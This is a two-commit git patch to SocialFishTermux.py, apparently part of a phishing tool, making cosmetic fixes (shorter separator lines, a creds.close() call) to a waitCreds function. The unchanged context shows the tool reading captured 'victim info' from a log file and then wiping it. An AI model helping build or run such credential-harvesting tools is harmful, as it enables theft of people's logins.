From 543a774c8963c41e2c83d816843f7b8f95613abb Mon Sep 17 00:00:00 2001 From: Micrafast <1191069521@qq.com> Date: Thu, 7 Jun 2018 22:30:48 +0800 Subject: [PATCH 1/2] BUGFIX bugfix --- SocialFishTermux.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/SocialFishTermux.py b/SocialFishTermux.py index 01caed7..564b7a5 100644 --- a/SocialFishTermux.py +++ b/SocialFishTermux.py @@ -138,10 +138,12 @@ def waitCreds(): with open('ServerTermux/www/iplog.txt') as creds: lines = creds.read().rstrip() if len(lines) != 0: - print '======================================================================'.format(RED, END) + print '================================================='.format(RED, END) print ' {0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines system('rm -rf ServerTermux/www/iplog.txt && touch ServerTermux/www/iplog.txt') - print '======================================================================'.format(RED, END) + print '================================================='.format(RED, END) + + creds.close() def runPEnv(): system('clear') From d5d678eca12eac201eaaf0af5343b5c9f896c802 Mon Sep 17 00:00:00 2001 From: Micrafast <1191069521@qq.com> Date: Thu, 7 Jun 2018 22:32:43 +0800 Subject: [PATCH 2/2] BUGFIX2 bugfix --- SocialFishTermux.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SocialFishTermux.py b/SocialFishTermux.py index 564b7a5..d02355d 100644 --- a/SocialFishTermux.py +++ b/SocialFishTermux.py @@ -142,8 +142,8 @@ def waitCreds(): print ' {0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines system('rm -rf ServerTermux/www/iplog.txt && touch ServerTermux/www/iplog.txt') print '================================================='.format(RED, END) - - creds.close() + + creds.close() def runPEnv(): system('clear')